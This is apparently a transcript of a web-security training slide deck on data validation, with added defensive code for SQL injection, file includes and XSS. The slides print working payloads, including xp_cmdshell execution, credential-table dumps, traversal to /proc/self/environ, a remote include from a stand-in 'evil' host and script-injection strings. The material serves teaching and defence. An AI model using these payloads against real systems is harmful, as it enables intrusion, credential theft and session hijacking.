Web Application Security 101 - 14 Data Validation

Post on 10-May-2015

Category: Software

DESCRIPTION

In part 14 of Web Application Security 101 you will learn about SQL Injection, Cross-site Scripting, Local File Includes and other common types of data validation problems.

TRANSCRIPT

Data Validation

Common input validation problems.

Types Of Problems

SQL Injection

Local File Includes

Cross-site Scripting

SQL Injection

SQL Injection is an attack where a partial or a complete SQL query is inserted/injected into another query run by the targeted application.

Types Of SQL Injection

Vanilla - when errors are displayed.

Blind - when no errors are displayed.

SQL Backends

There are multiple SQL backends that have various features.

Common Backends

MsSQL (Transact-SQL)

MySQL

PostgreSQL

Oracle (PL/SQL)

Many More

SQL Injection In Principle

Works by injecting SQL parts into already existing queries.

SELECT * FROM table WHERE column = 'injected by the user'

In Detail

Assuming that $value is a variable controlled by the user:

$query = "SELECT * FROM table WHERE column = '" . $value . "'";

When $value equals ' OR '1'='1 then:

SELECT * FROM table WHERE column = '' OR '1'='1'
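The two slides above show the pattern (string concatenation) and the payload (' OR '1'='1). The block below is an added example, not code from the original slides: it builds a constructed in-memory SQLite table, runs the concatenated query the slide describes beside a parameterized query, and returns both results so the difference is visible. The table name users, its rows, and the function names are assumptions made for the demonstration.

```python
import sqlite3


def make_db():
    """Constructed sample data: a tiny users table for the demonstration."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "admin"), (2, "bob", "user"), (3, "carol", "user")],
    )
    return conn


def lookup_concat(conn, value):
    """Vulnerable: the slide's pattern, user data spliced into the query text."""
    query = "SELECT name FROM users WHERE name = '" + value + "'"
    return [row[0] for row in conn.execute(query)]


def lookup_param(conn, value):
    """Fixed: the value travels as a bound parameter and is never parsed as SQL."""
    query = "SELECT name FROM users WHERE name = ?"
    return [row[0] for row in conn.execute(query, (value,))]


def demo():
    """Run both lookups with a normal name and with the slide's payload."""
    conn = make_db()
    payload = "' OR '1'='1"
    return {
        # Normal input behaves the same either way.
        "concat_normal": lookup_concat(conn, "bob"),
        # Concatenation turns the payload into WHERE name = '' OR '1'='1',
        # which is true for every row.
        "concat_payload": lookup_concat(conn, payload),
        "param_normal": lookup_param(conn, "bob"),
        # The bound parameter is compared literally; no user is named that.
        "param_payload": lookup_param(conn, payload),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

The parameterized version needs no escaping of $value at all: the database driver receives the value separately from the statement text, so quote characters in the input have no syntactic meaning. This is the general fix for every injection variant listed on the following slides, not only for the boolean case shown here.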

SQL Injection Techniques

Union Selection - to obtain values from other tables.

SELECT * FROM table WHERE column = '' UNION SELECT 'a','b','c','d','e'

Boolean Selection - to create universally true or false statements.

SELECT * FROM table WHERE column = '' OR '1'='1'

Time Selection - to measure injection by timing the execution.

SELECT * FROM table WHERE column = '' OR IF(1=1, sleep(10), 'false')--'

MsSQL Injection Techniques

Table enumeration - find the table structure.

SELECT * FROM table WHERE column = '' HAVING 1=1--'

SELECT * FROM table WHERE column = '' GROUP BY column1,columnN HAVING 1=1--

Code execution - running arbitrary commands.

SELECT * FROM table WHERE column = ''; exec master.dbo.xp_cmdshell 'command'--'

Query delay - timing delay after query.

SELECT * FROM table WHERE column = ''; WAITFOR DELAY '0:0:30'

MySQL Injection Techniques Pt. 1

Finding information - retrieving various server variables and functions.

SELECT * FROM table WHERE column = '' AND 1=0 UNION SELECT @@version, 'b',

User enumeration - retrieving MySQL server users and passwords.

SELECT * FROM table WHERE column = '' UNION SELECT * FROM mysql.user#'

MySQL Injection Techniques Pt. 2

Table enumeration - retrieving MySQL server tables.

SELECT * FROM t WHERE c = '' UNION SELECT * FROM information_schema.tables#

Column enumeration - retrieving MySQL server columns.

SELECT * FROM t WHERE c = '' UNION SELECT * FROM information_schema.columns#

SQL Injection Tools

Sqlninja

Sqlmap

SQL Injection Is Art

There are many different types of tools and techniques with various levels of complexity used to exploit SQL Injection vulnerabilities.

File Includes

This attack vector is used to perform arbitrary file/URL read or execution using low-level functions and application-specific features.

Types Of File Includes

Local File Include - when the included file is local.

Remote File Include - when the included file is fetched remotely.

File Include In Principle

Works when user data reaches a function used to fetch a file.

<?php fetchfile("./path/to/file/injected by the user") ?>

In Detail

Assuming that $value is a variable controlled by the user:

<?php fetchfile("./path/to/file/" . $value) ?>

When $value equals ../../../index.php then:

<?php fetchfile("./path/to/file/../../../index.php") ?>

File Include Techniques Pt. 1

Usage of ../ to traverse the directory structure.

<?php fetchfile("./path/to/file/../../../index.php") ?>

Usage of null (0x00) to terminate strings for low-level C functions.

<?php fetchfile("./path/to/file/../../../index.php\0.txt") ?>

File Include Techniques Pt. 2

Usage of overlong dot (0xc0, 0xae) to bypass escape functions.

<?php fetchfile("./path/to/file/\xc0\xae./../../index.php\0.txt") ?>

Usage of system resources to cause other behaviour.

<?php fetchfile("./path/to/file/../../../../../proc/self/environ") ?>

Remote File Includes

This type of problem occurs when injecting a remote file controlled by the attacker. In this case, the attacker has greater control over the exploitation process if something special is done to the file.

<?php fetchfile("http://evil/path/to/file") ?>
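The slides' fetchfile() is a placeholder for any function that reads a path built from user data. The block below is an added example, not code from the original slides: it shows the containment check a defender would put in front of such a function, and exercises it against each technique on the preceding slides (../ traversal, a NUL byte, the overlong dot, an absolute path, and a remote URL). The sandbox directory, file names and function names are constructed for the demonstration and are not part of the original.

```python
import os
import tempfile


def make_sandbox(tmp_root):
    """Constructed layout: base/ holds the one file the app may serve;
    secret.php sits one level above it, outside the allowed tree."""
    base = os.path.join(tmp_root, "files")
    os.makedirs(base, exist_ok=True)
    with open(os.path.join(base, "readme.txt"), "w") as f:
        f.write("public file\n")
    with open(os.path.join(tmp_root, "secret.php"), "w") as f:
        f.write("<?php /* outside the sandbox */ ?>\n")
    return base


def safe_fetchfile(base, user_value):
    """Return the contents of base/user_value, or None if the request is rejected.

    The checks map onto the slide techniques: NUL bytes aimed at C string
    functions, URL schemes (remote file include), non-ASCII/overlong encodings,
    and ../ or absolute paths that leave the base directory."""
    if "\x00" in user_value:
        return None
    if "://" in user_value:
        return None
    if not user_value.isascii():
        return None
    base_real = os.path.realpath(base)
    # realpath resolves ../ segments and symlinks, so the containment test
    # below is made on the canonical target, not on the raw string.
    target = os.path.realpath(os.path.join(base_real, user_value))
    try:
        if os.path.commonpath([base_real, target]) != base_real:
            return None
    except ValueError:  # e.g. different drives on Windows
        return None
    if not os.path.isfile(target):
        return None
    with open(target) as f:
        return f.read()


def demo():
    """Try a legitimate request and one request per slide technique."""
    with tempfile.TemporaryDirectory() as root:
        base = make_sandbox(root)
        return {
            "normal": safe_fetchfile(base, "readme.txt"),
            "traversal": safe_fetchfile(base, "../secret.php"),
            "nul_byte": safe_fetchfile(base, "../secret.php\x00.txt"),
            "overlong_dot": safe_fetchfile(base, "\xc0\xae./../secret.php"),
            "absolute": safe_fetchfile(base, "/etc/hostname"),
            "remote": safe_fetchfile(base, "http://evil/path/to/file"),
        }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, repr(result))
```

The important design choice is that the decision is made on the canonical path (after realpath) rather than by searching the input for "../": the string-level rejections at the top are cheap early exits, but the commonpath comparison is what actually guarantees the read stays inside the allowed tree, whatever encoding trick was used to get there.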

FI Is Art

File Include attacks are a popular mechanism for compromising web applications.

Cross-site Scripting

Cross-site Scripting is a type of vulnerability where an attacker can bypass the SOP (Same Origin Policy) through client-side injection or by abusing forms of configuration.

Types Of XSS

Reflected - when the injection is immediately returned.

Stored - when the injection is stored.

DOM-based - when the injection occurs due to JS.

Others - there are many other uncategorized variants.

XSS In Principle

Works by injecting fragments of HTML/JS inside the web page.

<span>injected by the user</span>

In Detail

Assuming that $value is a variable controlled by the user:

<span><?php echo $value ?></span>

When $value equals <script>alert(1)</script> then:

<span><script>alert(1)</script></span>

XSS Techniques Pt. 1

When script tags are sanitized or escaped.

<span><img src=a onerror=alert(1)></span>

When the injection occurs inside an event attribute.

<button onclick="alert(1)"></button>

XSS Techniques Pt. 2

When the injection occurs inside a JavaScript string within a script tag.

<script>var a = ""; alert(1); "";</script>

When the injection occurs in multiple small places.

<span><script>alert(1)/* is something like */</script></span>
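The "In Detail" slide and the two technique slides above show the same root cause in three output contexts: HTML text, an HTML attribute, and a JavaScript string. The block below is an added example, not code from the original slides: it encodes a value for each of those contexts and renders the slides' payloads through each encoder so the result can be inspected. The render_* function names and the <input> / var a templates are assumptions chosen for the demonstration; the page itself only shows the <span> case.

```python
import html
import json


def render_text(value):
    """HTML text context (the slide's <span>...</span>): escape the five
    significant characters so '<' can never start a tag."""
    return "<span>" + html.escape(value, quote=True) + "</span>"


def render_attribute(value):
    """HTML attribute context: the value is always quoted, and quote=True
    turns '"' into &quot; so the attribute cannot be closed early."""
    return '<input value="' + html.escape(value, quote=True) + '">'


def render_js_string(value):
    """JavaScript string context inside <script>: JSON-encode the value (which
    escapes quotes and backslashes), then additionally escape <, > and & so a
    literal </script> in the data cannot terminate the script element."""
    literal = json.dumps(value)
    literal = (literal.replace("<", "\\u003c")
                      .replace(">", "\\u003e")
                      .replace("&", "\\u0026"))
    return "<script>var a = " + literal + ";</script>"


def demo():
    """Constructed payloads: the slides' examples plus one per context."""
    payloads = {
        "script_tag": "<script>alert(1)</script>",
        "event_handler": "<img src=a onerror=alert(1)>",
        "attribute_breakout": '" onmouseover="alert(1)',
        "js_string_breakout": '"; alert(1); "',
        "script_close": "</script><script>alert(1)</script>",
    }
    return {
        name: {
            "text": render_text(p),
            "attribute": render_attribute(p),
            "js_string": render_js_string(p),
        }
        for name, p in payloads.items()
    }


if __name__ == "__main__":
    for name, rendered in demo().items():
        print(name)
        for ctx, out in rendered.items():
            print("  ", ctx, out)
```

Note that the encoder must match the context the value lands in: HTML escaping alone would not make the JS string case safe (a '"' is harmless to an HTML parser but closes the JavaScript string), and JSON encoding alone would not stop </script> from closing the element, which is why render_js_string does both steps.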

Stored XSS

The injection is temporarily or permanently stored.

<?php $_SESSION['name'] = $_GET['name'] ?>

Later on there is this code that causes the XSS to occur:

<span><?php echo $_SESSION['name'] ?></span>

DOM-based XSS

The injection may occur at any point but is triggered via JavaScript.

<script>
var match = document.location.search.match(/[?&]name=(\w+)/);
if (match) { document.write("Hello " + match[1]); }
</script>

There are many different ways an injection can occur.

Other Forms Of XSS

The presence of crossdomain.xml may open the app to XSS.

<?xml version="1.0" encoding="UTF-8" ?><cross-domain-policy><allow-access-from domain="*"/></cross-domain-policy>
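For comparison with the permissive policy above, the following is an added example of a restrictive crossdomain.xml and is not taken from the original slides. The host name app.example.com is a placeholder; a real deployment would list only the exact origins that need cross-domain access.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
  <!-- Only this file (the master policy) may grant access; ignore policy files elsewhere on the site. -->
  <site-control permitted-cross-domain-policies="master-only"/>
  <!-- Name each trusted origin explicitly instead of "*"; secure="true" refuses requests that arrive over plain HTTP. -->
  <allow-access-from domain="app.example.com" secure="true"/>
</cross-domain-policy>
```

The wildcard in the slide's version lets content served from any origin read responses from this host with the user's cookies attached, which is the same origin boundary XSS normally has to break; the restricted form keeps that boundary in place for every origin not listed.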

XSS Is Art

Cross-site scripting is a very popular and widespread vulnerability.

Other Input Validation Flaws

Memory Corruption

Command Injection

LDAP Injection

XML Injection

XPATH Injection

SSI Injection

Remote File Inclusion

Many, Many More

Lab

We will be finding data validation problems.
